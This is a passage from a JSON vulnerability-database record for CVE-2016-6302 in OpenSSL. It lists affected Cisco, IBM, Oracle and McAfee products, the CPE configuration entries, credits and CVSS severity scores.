"scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" } ], "sources": [ { "db": "BID", "id": "92628" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "CNNVD", "id": "CNNVD-201608-449" }, { "db": "NVD", "id": "CVE-2016-6302" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-6302" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Shi Lei.,The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201608-449" } ], "trust": 0.6 }, "cve": "CVE-2016-6302", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-6302", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", 